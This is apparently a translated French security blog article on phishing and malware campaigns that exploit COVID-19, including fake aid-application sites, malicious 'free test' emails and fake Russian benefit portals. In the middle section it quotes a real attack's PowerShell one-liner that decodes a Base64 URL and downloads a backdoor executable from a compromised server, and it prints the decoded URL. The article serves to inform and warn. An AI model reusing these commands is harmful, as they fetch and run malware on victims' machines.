Les attaquants continuent d'exploiter le thème COVID-19, créant de plus en plus de menaces pour les utilisateurs qui s'intéressent vivement à tout ce qui concerne l'épidémie. Dans un article précédent, nous avons déjà parlé des types de logiciels malveillants apparus à la suite du coronavirus, et nous parlerons aujourd'hui des techniques d'ingénierie sociale que les utilisateurs de différents pays ont déjà rencontrées, y compris en Russie. Tendances générales et exemples - sous la coupe.
Rappelez-vous la dernière fois que nous avons parlé de la façon dont les gens lisent facilement non seulement sur le coronavirus et le cours de l'épidémie, mais aussi sur les mesures de soutien financier? Voici un bon exemple. Dans l'État allemand de Rhénanie du Nord-Westphalie il NRW, une curieuse attaque de phishing a été découverte. Les attaquants ont créé des copies du site Web du ministère de l'Économie ( NRW ministère des Affaires économiques), où toute personne peut présenter une demande d'aide financière. Un tel programme existe vraiment et il s'est avéré être entre les mains d'arnaqueurs. Ayant reçu les données personnelles de leurs victimes, ils ont déjà déposé une demande sur le site Internet du Ministère, mais ont indiqué d'autres coordonnées bancaires. Selon des chiffres officiels, 4 000 demandes de ce type ont été déposées jusqu'à la divulgation du régime. En conséquence, 109 millions de dollars destinés aux citoyens concernés sont tombés entre les mains de fraudeurs.
Voulez-vous un test gratuit pour COVID-19?
Un autre exemple révélateur de phishing par coronavirus a été trouvé dans les e-mails. Les messages ont attiré l'attention des utilisateurs avec une proposition de subir gratuitement des tests d'infection à coronavirus. Dans la pièce jointe de ces lettres se trouvaient des exemples de Trickbot / Qakbot / Qbot. Et lorsque ceux qui voulaient vérifier leur santé ont commencé à «remplir le formulaire ci-joint», un script malveillant a été téléchargé sur l'ordinateur. Et afin d'éviter la vérification par la méthode du sandbox, le script n'a commencé à charger le virus principal qu'après un certain temps, lorsque les systèmes de sécurité ont été convaincus qu'aucune activité malveillante ne se produisait.Il a également été facile de convaincre la plupart des utilisateurs d'activer les macros. Pour ce faire, une astuce standard a été utilisée: pour remplir le questionnaire, vous devez d'abord activer les macros, ce qui signifie que vous devez exécuter le script VBA.
Comme vous pouvez le voir, le script VBA est spécialement masqué contre les antivirus.
Windows a une fonction d'attente lorsque l'application attend / T <secondes> avant d'accepter la réponse "Oui" par défaut. Dans notre cas, le script a attendu 65 secondes avant de supprimer les fichiers temporaires: et en cours d'attente, un malware a été téléchargé. Pour ce faire, un script PowerShell spécial a été lancé:cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps1.bat & del C:\Users\Public\1.txt
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt
Après avoir décodé la valeur Base64, le script PowerShell charge la porte dérobée située sur le serveur Web précédemment piraté d'Allemagne:http://automatischer-staubsauger.com/feature/777777.png
et l'enregistre sous le nom:C:\Users\Public\tmpdir\file1.exe
Le dossier ‘C:\Users\Public\tmpdir’est supprimé lorsque le fichier 'tmps1.bat' est exécuté, qui contient la commandecmd /c mkdir ""C:\Users\Public\tmpdir"".Attaque ciblée contre des agences gouvernementales
De plus, les analystes de FireEye ont récemment rendu compte d'une attaque ciblée par APT32 visant les structures du gouvernement de Wuhan, ainsi que le ministère chinois de la gestion des urgences. L'un des RTF distribués contenait un lien vers un article du New York Times intitulé Coronavirus Live Updates: China is Tracking Travellers From Hubei . Cependant, lors de sa lecture, le téléchargement de logiciels malveillants s'est produit (les analystes de FireEye ont identifié l'instance comme METALJACK).Fait intéressant, au moment de la détection, aucun des antivirus n'a détecté cette instance selon Virustotal.
Quand les sites officiels «mentent»
L'exemple le plus brillant d'attaque de phishing s'est produit en Russie l'autre jour. La raison en est la nomination de l'allocation tant attendue pour les enfants de 3 à 16 ans. Lorsque le début de l'acceptation des candidatures a été annoncé le 12 mai 2020, des millions de personnes se sont précipitées sur le site Web des services d'État pour obtenir l'aide tant attendue et ont fait tomber le portail pas pire qu'une attaque DDoS professionnelle. Lorsque le président a déclaré que «les services de l'État ne pouvaient pas gérer le flux des candidatures», ils ont commencé à parler du fait qu'un site alternatif pour accepter les candidatures avait commencé à fonctionner.
Le problème est que plusieurs sites ont gagné en même temps, et tandis que l'un, le vrai sur posobie16.gosuslugi.ru, accepte vraiment les candidatures, des dizaines d' autres collectent des données personnelles d'utilisateurs de confiance .Des collègues de HeartInform ont trouvé environ 30 nouveaux domaines frauduleux dans la zone .ru. Infosecurity a Softline Company a suivi plus de 70 faux sites de services publics similaires depuis début avril. Leurs créateurs manipulent des symboles familiers et utilisent également des combinaisons des mots gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie et ainsi de suite.Agiotage et ingénierie sociale
Tous ces exemples ne font que confirmer que les attaquants ont réussi à monétiser le thème du coronavirus. Et plus la tension sociale est élevée et plus les questions ne sont pas claires, plus les fraudeurs ont de chances de voler des données importantes, d'obliger les gens à donner leur argent par eux-mêmes ou simplement de pirater plus d'ordinateurs.Et étant donné que la pandémie a rendu les personnes potentiellement non préparées à travailler à domicile en grand nombre, non seulement les données personnelles, mais aussi les données d'entreprise sont en danger. Par exemple, récemment, des utilisateurs de Microsoft 365 (anciennement Office 365) ont également été victimes d'une attaque de phishing. Les gens ont massivement reçu des messages vocaux «manqués» dans les pièces jointes aux lettres. Cependant, en fait, les fichiers étaient une page HTML qui envoyait les victimes de l'attaque vers la fausse page de connexion Microsoft 365. En conséquence - perte d'accès et compromission de toutes les données du compte.